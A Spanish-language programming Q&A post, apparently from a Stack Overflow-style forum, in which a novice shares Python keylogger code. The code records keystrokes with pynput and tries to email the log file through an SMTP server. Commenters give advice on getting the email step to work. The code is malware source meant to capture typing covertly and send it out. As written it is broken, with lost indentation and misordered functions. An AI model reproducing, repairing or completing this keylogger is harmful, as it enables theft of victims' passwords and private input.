# ¿Que me estoy dejando? No recibo mail de keylogger

Tags: python

**Hola a tod@s, soy muy novato en python y me estoy adentrando en el mundo, estoy probando de hacer un Keylogger a partir de diversos tutoriales y que me envíe lo registrado cada X tiempo.
La cosa es que no recibo ningún mail pero registra correctamente todo en un log.txt**

He ido construyendo código a partir de diversos videos y estoy atascadisimo, he probado con un gmail permitiendo aplicaciones no seguras, después con un hotmail y nada, intuyo que el problema está en el código pero no se en que parte ni el porque

### ¿Que me estoy dejando o que he hecho mal?

```
import datetime
import time
from pynput.keyboard import Listener
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib


d = datetime.datetime.now().strftime('%Y-%m,-%d_%H-%M-%S')
file_name = 'pulsaciones_grabadas_{}.txt'.format(d)
def key_recorder(key):
key = str(key)
f = open('pulsaciones_grabadas_{}.txt'.format(d), 'a')
t0 = time.time()

if key == "'\\x03'":
    f.close()
    quit()

if key == 'Key.enter':
    f.write('\n')
elif key == 'Key.space':
    f.write(' ')
elif key == 'Key.backspace':
    f.write('%BORRAR')
else:
    f.write(key.replace("'", ""))
if time.time()-t0 > 60:
    f.close()
    enviar_email(file_name)


with Listener(on_press=key_recorder) as l:
l.join()


def enviar_email(nombre):
username = "xxxxx@hotmail.com"
password = "xxxxx"

destinatario = "xxxx@hotmail.com"
asunto = "Prueba Keylogger1"


mensaje = MIMEMultipart()
mensaje["Subject"] = asunto
mensaje["From"] = username
mensaje["To"] = destinatario
mensaje.attach(MIMEText(asunto, 'plain'))
attachment = open(nombre, 'r')
```

#Payload + settings

```
p = MIMEBase('aplication', 'octet-stream')
p.set_payload((attachment).read())
p.add_header('Content-Disposition', "attachment; filename= %s" % str(nombre))
mensaje.attach(p)
```

#Inicio servidor smpt

```
server = smtplib.SMTP('smtp.gmail.com: 587')
server.starttls()
server.login(mensaje['From'], password)
server.sendmail(mensaje['From'], mensaje['To'], mensaje.as_string())
server.quit()
```

Comment: Si dices que logra guardar el archivo bien. Probablemente te convenga intentar solucionar el problema de enviar el email separado del tipo de contenido. Puedes intentar que envíe un email simple, y luego ir avanzando hasta enviar datos más estructurados como la salida del programa que presentas.

Comment: Muchas gracias por la respuesta Vichoko, me pondrias decir como editarlo para hacer una prueba mas simple y ver si funciona? Muchisimas gracias!!

Comment: Identifica cuales lineas son especificas para enviar el email y quita todo el resto. Luego intenta modificarlo o complementarlo con soluciones que encuentres en internet, hasta que te funcione. Cuando te funcione vuelve a agregarle el código para generar el contenido especifico que te interesa enviar.